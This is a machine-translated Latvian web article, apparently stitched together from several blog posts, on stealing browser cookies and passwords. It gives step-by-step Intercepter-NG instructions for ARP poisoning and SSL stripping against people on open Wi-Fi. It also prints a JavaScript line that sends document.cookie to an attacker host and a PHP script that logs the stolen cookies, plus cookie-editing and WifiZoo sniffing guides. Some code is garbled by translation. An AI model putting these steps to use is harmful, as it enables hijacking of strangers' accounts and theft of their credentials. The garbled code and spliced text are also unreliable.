mājas - Programmatūra
Kā pārtvert sīkfailus. Vienkāršs veids, kā nozagt cepumus

Par atvērto Wifi piekļuves punktu briesmām, paroļu pārtveršanu.

Šodien mēs apskatīsim paroļu pārtveršanu, izmantojot Wi-Fi, un sīkfailu pārtveršanu, izmantojot programmu Wi-Fi.

Uzbrukums notiks sakarā ar Sniffing.

Sniffing— sniff tulkojumā nozīmē “šņaukt”. Sniffing ļauj analizēt tīkla darbību internetā, skatīt, kuras vietnes lietotājs apmeklē, un pārtvert paroles. Bet to var izmantot arī lietderīgiem nolūkiem, lai klausītos vīrusus, kas sūta jebkādus datus uz internetu.


Metode, kuru es parādīšu, ir diezgan primitīva un vienkārša. Patiesībā jūs varat izmantot programmu spēcīgāk.
Programmas oficiālā vietne sniff.su (nokopējiet saiti un atveriet jaunā cilnē), to varat lejupielādēt sadaļā "Lejupielādēt".
Ir versija operētājsistēmai Windows Unix sistēmas un Android ierīcēm.
Mēs apsvērsim Windows, jo tas ir visvairāk populāra sistēma un šeit programma ir vismodernākā.
Jūsu pārlūkprogramma vai antivīruss var sūdzēties, ka programma ir bīstama, taču jūs pats saprotat, ka šī ir uzlaušanas programma, un tā vienmēr reaģēs uz šādiem uzlaušanas gadījumiem.
Programma tiek lejupielādēta uz zip arhīvs, vajag tikai izpakot programmu mapē un izmantot, nekas nav jāinstalē.
Programmai ir iespēja sakārtot dažādas Mitm uzbrukumi Wi-Fi tīklā.
Raksts ir rakstīts tikai informatīvos nolūkos, lai ar piemēru parādītu atklātības briesmas WiFi punkti jebkura noteiktas darbības, jūs veicat savu risku un risku. Un vēlos atgādināt par kriminālatbildību par citu personu datu aizsardzību.

apkalpošana avi1 piedāvā elpu aizraujoši lētas cenas par iespēju pasūtīt abonentus savam Instagram profilam. Palieliniet tiešsaistes popularitāti vai pārdošanu tieši tagad, netērējot daudz pūļu un laika.

Darbs ar programmu Intercepter NG

Tātad programma tiek palaista, izmantojot Intercepter-NG.exe.
Programmai ir angļu valodas interfeiss, bet, ja esat pārliecināts datora lietotājs, es domāju, ka jūs to izdomāsit.

Zemāk būs video par iestatīšanu (tiem, kas dod priekšroku skatīties, nevis lasīt).
— Izvēlieties vēlamo tīklu augšpusē, ja jums ir vairāki no tiem.
— Pārslēgt veidu Ethernet/WiFi, ja jums ir Wi-Fi, tad jums ir jāatlasa Wi FI ikona (pa kreisi no tīkla izvēles)

— Nospiediet pogu Skenēšanas režīms(radara ikona)
- Tukšā laukā ar peles labo pogu noklikšķiniet un noklikšķiniet uz konteksta izvēlne Viedā skenēšana
— tiks parādītas visas tīklam pievienotās ierīces
— Izvēlieties upuri (varat atlasīt visus, turot nospiestu taustiņu Shift), tikai neatzīmējiet pašu maršrutētāju, tā IP parasti ir 192.168.1.1
- Pēc atlasīšanas ar peles labo pogu noklikšķiniet un noklikšķiniet Pievienot nat


- Dodieties uz cilni Nat
- IEKŠĀ Stealth ip Vēlams nomainīt pēdējo ciparu uz jebkuru neaizņemtu, tas paslēps jūsu īsto IP.
- Ieliec ķeksīti SSL josla Un SSL Mitm.


- Klikšķis Iestatījumi(zobrati labajā pusē).
- Ieliec ķeksīti Augšāmcelšanās(Tas ļaus pārtvert šifrētā HTTPS protokola paroles un sīkfailus) un noņemt Viltīgs IP/Mac. Varat atzīmēt izvēles rūtiņu Cepumu slepkava, pateicoties viņai, upuris tiks izmests no pašreizējās lapas, piemēram sociālais tīkls un cietušajam būs atkārtoti jāievada parole, un mēs to pārtversim. Salīdziniet iestatījumus ar attēlu.


— Šeit iestatīšana ir pabeigta, aizveriet iestatījumus ar atzīmi.
— Iestatīšana ir pabeigta, varat sākt uzbrukumu.
— Nospiediet pogu augšpusē Sāciet/pārtrauciet šņaukšanu(trijstūris), tajā pašā logā noklikšķiniet uz starojuma ikonas apakšā Start/Stop ARP Poison
— Dodieties uz cilni Paroles režīms un ar peles labo pogu noklikšķiniet logā un atlasiet Rādīt sīkfailus(“Tas ļaus parādīt upuru ievadītās sīkdatnes un paroles”)
Tas arī viss, mēs gaidām, kad kāds ievadīs paroli.
Dažreiz gadās, ka internets pārstāj darboties, mēģiniet pats piekļūt internetam, ja tas nedarbojas, restartējiet programmu.
Es pamanīju, ka ne vienmēr ir iespējams pārtvert paroli, bet patiesībā tā darbojas gandrīz bez kļūmēm.

Tas arī viss. Mēs apskatījām paroļu pārtveršanu, izmantojot Wi-Fi, un sīkfailu pārtveršanu, izmantojot Wi-Fi.

parūpējies par sevi

Sīkdatnes - informācija teksta faila veidā, ko tīmekļa vietne saglabā lietotāja datorā. Satur autentifikācijas datus (pieteikšanās/parole, ID, tālruņa numurs, adrese pastkaste), lietotāja iestatījumi, piekļuves statuss. Saglabāts pārlūkprogrammas profilā.

Sīkdatņu uzlaušana ir tīmekļa resursa apmeklētāja sesijas zādzība (vai “nolaupīšana”). Privāta informācija kļūst pieejama ne tikai sūtītājam un saņēmējam, bet arī trešajai pusei - personai, kas veica pārtveršanu.

Sīkfailu uzlaušanas rīki un paņēmieni

Datoru zagļiem, tāpat kā viņu kolēģiem dzīvē, bez prasmēm, veiklības un zināšanām, protams, ir arī savi instrumenti - sava veida galveno atslēgu un zondu arsenāls. Apskatīsim populārākos trikus, ko hakeri izmanto, lai no interneta lietotājiem iegūtu sīkfailus.

Sniffers

Īpašas programmas izsekošanai un analīzei tīkla trafiku. Viņu nosaukums cēlies no angļu valodas darbības vārda “sniff” (sniff), jo. burtiski “izšņaukt” pārsūtītās paketes starp mezgliem.

Taču uzbrucēji izmanto sniffer, lai pārtvertu sesijas datus, ziņojumus un citus datus konfidenciāla informācija. Viņu uzbrukumu mērķi galvenokārt ir neaizsargāti tīkli, kur sīkfaili tiek nosūtīti atvērtā HTTP sesijā, tas ir, tie praktiski nav šifrēti. (Šajā ziņā visneaizsargātākais ir publiskais Wi-Fi.)

Lai iegultu sniffer interneta kanālā starp lietotāja mezglu un tīmekļa serveri, tiek izmantotas šādas metodes:

  • tīkla saskarņu (centrmezglu, slēdžu) “klausīšanās”;
  • trafika atzarošana un kopēšana;
  • savienojuma izveide ar tīkla kanāla spraugu;
  • analīze, izmantojot īpašus uzbrukumus, kas novirza upura trafiku uz sniffer (MAC-spoofing, IP-spoofing).

Saīsinājums XSS apzīmē Cross Site Skriptēšana — starpvietņu skriptēšana. Izmanto, lai uzbruktu vietnēm, lai nozagtu lietotāja datus.

XSS princips ir šāds:

  • uzbrucējs ievieto ļaunprātīgu kodu (īpašu slēptu skriptu) vietnes tīmekļa lapā, forumā vai ziņojumā (piemēram, sarakstoties sociālajā tīklā);
  • upuris dodas uz inficēto lapu un aktivizē datorā instalēto kodu (noklikšķina, seko saitei utt.);
  • savukārt izpildītais kaitīgais kods “izņem” no pārlūkprogrammas lietotāja konfidenciālos datus (it īpaši sīkfailus) un nosūta tos uzbrucēja tīmekļa serverim.

Lai “implantētu” programmatūras XSS mehānismu, hakeri izmanto visu veidu ievainojamības tīmekļa serveros, tiešsaistes pakalpojumos un pārlūkprogrammās.

Visas XSS ievainojamības ir sadalītas divos veidos:

  • Pasīvs. Uzbrukums tiek iegūts, pieprasot noteiktu skriptu tīmekļa lapā. Ļaunprātīgs kods var ievadīt dažādās tīmekļa lapas veidlapās (piemēram, vietnes meklēšanas joslā). Visjutīgākie pret pasīvo XSS ir resursi, kas nefiltrē HTML tagus, kad tiek saņemti dati;
  • Aktīvs. Atrodas tieši serverī. Un tie tiek aktivizēti upura pārlūkprogrammā. Krāpnieki tos aktīvi izmanto visu veidu emuāros, tērzētavās un ziņu plūsmās.

Hakeri rūpīgi “maskē” savus XSS skriptus, lai upuris neko nenojauš. Viņi maina faila paplašinājumu, nodod kodu kā attēlu, motivē sekot saitei un piesaista viņus ar interesantu saturu. Rezultātā: PC lietotājs, nespējot kontrolēt savu zinātkāri, ar savu roku (ar peles klikšķi) nosūta sesijas sīkfailus (ar pieteikumvārdu un paroli!) XSS skripta autoram - datora nelietim.

Sīkdatņu aizstāšana

Visas sīkdatnes tiek saglabātas un nosūtītas uz tīmekļa serveri (no kuras tās "nāca") bez izmaiņām - to sākotnējā formā - ar tām pašām vērtībām, virknēm un citiem datiem. To parametru apzinātu pārveidošanu sauc par sīkfailu aizstāšanu. Citiem vārdiem sakot, nomainot sīkfailus, uzbrucējs izliekas par vēlmju domāšanu. Piemēram, veicot maksājumu interneta veikalā, sīkfails maina maksājuma summu uz leju – tādējādi notiek pirkumu “taupīšana”.

Nozagti sesijas sīkfaili sociālajā tīklā no kāda cita konta tiek “ievietoti” citā sesijā un citā datorā. Nozagto sīkfailu īpašnieks saņem pilnu piekļuvi upura kontam (korespondencei, saturam, lapas iestatījumiem), kamēr viņa atrodas savā lapā.

Sīkdatņu “rediģēšana” tiek veikta, izmantojot:

Fiziskā piekļuve datiem

Ļoti vienkārša ķēdeīstenošana sastāv no vairākiem posmiem. Bet tas ir efektīvs tikai tad, ja cietušā dators ar atvērtu sesiju, piemēram, VKontakte, tiek atstāts bez uzraudzības (un ilgu laiku!):

  1. IN adreses josla pārlūkprogramma ir ievadīta javascript funkcija, parādot visus saglabātos sīkfailus.
  2. Pēc “ENTER” nospiešanas tie visi parādās lapā.
  3. Sīkfaili tiek kopēti, saglabāti failā un pēc tam pārsūtīti uz zibatmiņas disku.
  4. Citā datorā sīkfaili tiek aizstāti jaunā sesijā.
  5. Tiek nodrošināta piekļuve cietušā kontam.

Parasti hakeri izmanto iepriekš minētos rīkus (+ citus) gan kombinācijā (jo aizsardzības līmenis daudzos tīmekļa resursos ir diezgan augsts), gan atsevišķi (kad lietotāji ir pārmērīgi naivi).

XSS + sniffer

  1. Tiek izveidots XSS skripts, kas norāda tiešsaistes sniffer (vai nu mājās gatavota, vai konkrēta pakalpojuma) adresi.
  2. Ļaunprātīgais kods tiek saglabāts ar paplašinājumu .img (attēla formāts).
  3. Pēc tam šis fails tiek augšupielādēts vietnes lapā, tērzēšanā vai personiskajā ziņojumā — kur tiks veikts uzbrukums.
  4. Lietotāja uzmanība tiek pievērsta izveidotajam “slazdam” (šeit stājas spēkā sociālā inženierija).
  5. Ja slazds tiek aktivizēts, sniferis pārtver sīkfailus no upura pārlūkprogrammas.
  6. Uzbrucējs atver sniffer žurnālus un izgūst nozagtos sīkfailus.
  7. Pēc tam tā veic aizstāšanu, lai iegūtu konta īpašnieka tiesības, izmantojot iepriekš minētos rīkus.

Sīkdatņu aizsardzība pret uzlaušanu

  1. Izmantojiet šifrētu savienojumu (izmantojot atbilstošus protokolus un drošības metodes).
  2. Neatbildiet uz apšaubāmām saitēm, attēliem vai vilinošiem piedāvājumiem iepazīties ar “jaunu bezmaksas programmatūru”. Īpaši no svešiniekiem.
  3. Izmantojiet tikai uzticamus tīmekļa resursus.
  4. Pabeidziet autorizēto sesiju, noklikšķinot uz pogas “Iziet” (ne tikai aizverot cilni!). It īpaši, ja esat pieteicies savā kontā nevis no personālā datora, bet, piemēram, no datora interneta kafejnīcā.
  5. Neizmantojiet pārlūkprogrammas funkciju "Saglabāt paroli". Saglabātie reģistrācijas dati ievērojami palielina zādzības risku. Neesiet slinks, netērējiet dažas minūtes laika, ievadot paroli un piesakoties katras sesijas sākumā.
  6. Pēc sērfošanas tīmeklī - sociālo tīklu, forumu, tērzēšanas sarunu, vietņu apmeklēšanas - izdzēsiet saglabātos sīkfailus un notīriet pārlūkprogrammas kešatmiņu.
  7. Regulāri atjauniniet pārlūkprogrammas un pretvīrusu programmatūru.
  8. Izmantojiet pārlūkprogrammas paplašinājumus, kas aizsargā pret XSS uzbrukumiem (piemēram, NoScript for FF un Google Chrome).
  9. Periodiski kontos.

Un pats galvenais, nezaudē modrību un uzmanību, atpūšoties vai strādājot internetā!

Kas ir cepums?

Ir mehānisms, kas ļauj http serverim saglabāt dažus teksta informācija, un pēc tam sazinieties ar viņu. Šī informācija sauc par cepumu. Būtībā katrs sīkfails ir pāris: parametra nosaukums un tā vērtība. Katram sīkfailam tiek piešķirts arī domēns, kuram tas pieder. Drošības apsvērumu dēļ visās pārlūkprogrammās http serverim ir atļauts piekļūt tikai sava domēna sīkfailam. Turklāt sīkfailiem var būt derīguma termiņš, un tādā gadījumā tie tiks saglabāti datorā līdz šim datumam, pat ja aizverat visus pārlūkprogrammas logus.


Kāpēc sīkfaili ir svarīgi?

Visas vairāku lietotāju sistēmas izmanto sīkfailus, lai identificētu lietotāju. Vai drīzāk, pašreizējais savienojums lietotājs ar pakalpojumu, lietotāja sesija. Ja kāds atpazīs jūsu sīkfailus, viņš varēs pieteikties sistēmā jūsu vārdā. Tā kā iekšā pašlaikļoti maz interneta resursu pārbauda IP adreses izmaiņas vienas lietotāja sesijas laikā.


Kā nomainīt vai aizstāt sīkfailus?

Pārlūkprogrammu izstrādātāji nenodrošina iebūvētus rīkus sīkfailu rediģēšanai. Bet jūs varat iztikt ar parasto piezīmju grāmatiņu.


1. darbība: izveidojiet teksta fails ar tekstu

Windows reģistra redaktora versija 5.00



@="C:\\IE_ext.htm"

Saglabājiet to ar nosaukumu IE_ext.reg

2. darbība. Izmantojot izveidoto failu, pievienojiet izmaiņas Windows reģistrā.

3. darbība: izveidojiet teksta failu ar tekstu

< script valoda = "javascript">
external.menuArguments.clipboardData.setData("Teksts" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);


Saglabājiet to ar nosaukumu C:\IE_ext.htm

4. darbība: dodamies uz mūs interesējošo vietni.

5. darbība: ar peles labo pogu noklikšķiniet uz tukšas vietas lapā un atlasiet izvēlnes vienumu "Darbs ar sīkfailiem". Atļaujiet piekļuvi starpliktuvei. Jūsu sīkfaili no šīs vietnes tiks novirzīti starpliktuvē. Varat ievietot viņu piezīmju grāmatiņu un apskatīt.


6. darbība. Lai mainītu dažus sīkfailus, rediģējiet failu C:\IE_ext.htm, aizstājot to testa nosaukums cepuma vārdā, testa vērtība- par tā nozīmi, testdomain.ru– uz vietnes domēnu. Ja nepieciešams, pievienojiet vairāk līdzīgu rindu. Lai atvieglotu kontroli, es skriptam pievienoju pašreizējo sīkfailu izvadi pirms un pēc izmaiņām: alert(external.menuArguments.document.cookie);

7. darbība: vēlreiz veiciet 5. darbību un pēc tam atsvaidziniet lapu.

Apakšējā rinda: mēs piekļūsim šim interneta resursam ar atjauninātiem sīkfailiem.

Kā nozagt sīkfailus, izmantojot JavaScript?

Ja uzbrucējam izdodas atrast iespēju upura datorā izpildīt patvaļīgu JavaScript skriptu, viņš var ļoti viegli nolasīt pašreizējos sīkfailus. Piemērs:


var str= document.cookie;

Bet vai viņš tos varēs pārsūtīt uz savu vietni, jo, kā jau norādīju iepriekš, JavaScript skripts nevarēs piekļūt vietnei, kas atrodas citā domēnā bez papildu apstiprinājuma? Izrādās, ka JavaScript skripts var ielādēt jebkuru attēlu, kas atrodas jebkurā http serverī. Vienlaikus pārsūtiet uz šo attēlu visu lejupielādes pieprasījuma teksta informāciju. Piemērs: http://hackersite.ru/xss.jpg?text_info Tātad, ja palaižat šo kodu:

var img= jauns attēls();

img.src= "http://hackersite.ru/xss.jpg?"+ kodētURI(dokuments.sīkdatne);


tad sīkfails nonāks pieprasījumā lejupielādēt “attēlu” un “nonāks” uzbrucējam.

Kā rīkoties ar šādiem pieprasījumiem lejupielādēt “attēlu”?

Uzbrucējam tikai jāatrod mitināšana ar PHP atbalstu un jāievieto šāds kods:

$uid=urldekods($_SERVER["VAUKĀJUMS_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Pēc tam visi šī skripta pieprasījuma parametri tiks saglabāti failā log.txt. Atliek tikai aizstāt iepriekš aprakstīto JavaScript skriptu http://hackersite.ru/xss.jpg uz ceļu uz šo php skriptu.


Apakšējā līnija

Es parādīju tikai vienkāršāko veidu, kā izmantot XSS ievainojamības. Taču tas pierāda, ka vismaz vienas šādas ievainojamības klātbūtne vairāku lietotāju interneta vietnē var ļaut uzbrucējam izmantot savus resursus jūsu vārdā.

Vai esat ievērojuši, ka, atgriežoties vietnē, kuru jau esat apmeklējis, vietne jūs atpazīst un tiek atvērta ar iestatījumiem, kurus lietojāt iepriekšējā reizē? Jā, un diezgan bieži? Tas notiek, pateicoties sīkfailiem, kas glabā informāciju par apmeklētājiem, piemēram, pieteikumvārdu, paroli, sesijas ID un citus mainīgos lielumus, kas nepieciešami, lai identificētu apmeklētāju un parādītu lapas saturu atbilstoši lietotāja vēlmēm, kas izvēlētas pēdējā resursa apmeklējuma laikā. Programma WebCookiesSniffer parādīs lietotājam sīkfailus un to saturu vietnēs, kuras lietotājs skatās pārlūkprogrammā.

Skatīt sīkfailus

Jūs atverat vietni, un WebCookiesSniffer tver cepumi s reālajā laikā. Lietderība pievieno visus noķertos sīkfailus tabulai, kurā tiek glabāti dati par resursdatoru, pieprasījuma ceļu, sīkfaila kopējo garumu, sīkfaila mainīgo skaitu un pašu sīkfailu ar mainīgo un vērtību nosaukumiem. WebCookiesSniffer var saglabāt apkopoto informāciju par sīkfailiem teksta failā. Programmai ir arī iespēja ģenerēt HTML pārskatu par visiem vai atlasītajiem sīkfailiem. Lai programma darbotos, jāinstalē WinPcap draiveris (kas atrodas arhīvā kopā ar WebCookiesSniffer). Lai mainītu WebCookiesSniffer programmas valodu uz krievu valodu, kopējiet failu WebCookiesSniffer_lng.ini (iekļauts arī arhīvā) direktorijā ar utilītu.

Programmas WebCookiesSniffer ekrānuzņēmumi



Sveiki, šis īsais raksts, diezgan pat Īss apraksts Es vēlētos veltīt sevi vienkāršs veids pārtveršana cepumi V wi-fi tīkli. Es šeit nestāstīšu, kas ir cepumi un kāpēc tie ir nepieciešami, ja cilvēks ir ieinteresēts pārtvert “maizes izstrādājumus”; bezvadu tīklā, manuprāt, viņam vajadzētu zināt, kas tas ir un kāpēc viņam tas ir vajadzīgs. Es teikšu tikai vienu: izmantojot šos failus, jūs varat piekļūt citu cilvēku kontiem dažādās vietnēs, kurās lietotājiem ir jāveic autentifikācijas process (piemēram, mail.ru, vkontakte.ru utt.).

Tātad sāksim. Vispirms mums jāatrod bezvadu tīkls, ar atvērtu interneta piekļuves vārteju, un vēlams, lai šim tīklam būtu diezgan daudz klientu. Piemēram, ir piemērots jebkurš tīkls lielos iepirkšanās centros, lidostās, dažādās kafejnīcās, kurās cilvēki parasti izmanto Wi-Fi piekļuve internetā, pasta lasīšanai, kontu pārbaudei dažādos iepazīšanās portālos, LJ un dažādu forumu apskatei. Tas viss ir tieši tas, kas mums vajadzīgs. Pieņemot lēmumu par tīkla atrašanās vietas izvēli, izpētot noteiktas maksimālā klientu skaita stundas, pāriesim tieši uz kaujas operācijām. Lai to izdarītu, mums ir nepieciešams klēpjdators ar Wi-Fi adapteri un noteiktu programmu komplektu. Manā gadījumā es izmantoju Acer klēpjdators Instalēta Aspire 3610, D-Link DWL G650 klienta wi-fi karte un BackTrack3 OS.

Es iesaku jums izmantot šo OS, jo tajā jau ir iekļauts viss programmu komplekts, kas jums var būt nepieciešams, un vissvarīgākā priekšrocība ir tā, ka jums nav jāinstalē Backtrack savā ierīcē. HDD, varat palaist šo OS tieši no kompaktdiska vai zibatmiņas diska.

Tagad pāriesim pie nepieciešamās programmatūras. Es izmantoju kismet tīkla atklāšanai un WifiZoo, lai pārtvertu sīkfailus. Es sīkāk pakavēšos pie otrās programmas. WifiZoo ir pasīvs gaisa viļņu skeneris un savāc diezgan daudz noderīga informācija, piemēram: pop3, smtp trafiks, http cookies/authinfo, msn, ftp akreditācijas dati, telnet tīkla trafiks, nbt utt. Vienīgais šīs programmas trūkums ir kanālu lēciena režīma trūkums, WifiZoo vienkārši klausās bezvadu interfeiss, un nevar, tā teikt, pārlēkt no kanāla uz kanālu. Bet šo trūkumu kompensē cita programma Kismet, kas atbalsta šo režīmu. Lai palaistu WifiZoo, jums būs nepieciešams:

  • pitons
  • kašķīgs
  • Kismet

Palaidīsim programmu, vispirms palaidīsim Kismet, lai atbalstītu kanālu pārlēcienu režīmu, pēc tam palaidīsim tieši WifiZoo. Jūsu priekšā vajadzētu parādīties šim logam:

Tagad atliek tikai sēdēt un gaidīt, kamēr kaut ko pārtver visu, ko programma pārtver, var atrast žurnālos, kas atrodas direktorijā ar programmu /logs/. Varat arī palaist GUI saskarni, kas automātiski izveido savienojumu ar http 127.0.0.1:8000

Es nerakstīšu par visām šīs brīnišķīgās programmas funkcijām, es domāju, ka jūs pats izdomāsit pārējās iespējas, un kopš tā laika Šis brīdis Mūs interesē tikai sīkdatnes. Noklikšķiniet uz saites, kas saka sīkfailus, un skatiet, ko mēs pārtvērām:



 


Lasīt:



Huawei un Honor programmaparatūras instalēšana un atjaunināšana

Huawei un Honor programmaparatūras instalēšana un atjaunināšana

Lai gan daudzi lietotāji tikai sapņo par Android 7.0 Nougat, Google ir nākamās Android 8.0 O versijas testēšanas beigu posmā....

Subtitru izveide Subtitru darbnīcā

Subtitru izveide Subtitru darbnīcā

Subtitru darbnīca ir bezmaksas un atvērtā koda lietojumprogramma. Šīs programmas priekšrocības ietver: draudzīgu...

Specialitāte "Infokomunikāciju tehnoloģijas un sakaru sistēmas" (bakalaura grāds) Infokomunikāciju tehnoloģijas un sakaru sistēmas 11

Specialitāte

Absolventa kvalifikācija: bakalaurs. Studiju formas un termiņi: pilna laika – 4 gadi; korespondence (usk.) - 3 gadi 3 mēneši Iestājeksāmeni: matemātika...

Odnoklassniki: kā atvērt manu lapu

Odnoklassniki: kā atvērt manu lapu

Mana Odnoklassniki lapa ir katra lietotāja personīgais profils, kurā ir par viņu norādītā informācija un fotogrāfijas. Pieejams...

plūsmas attēls RSS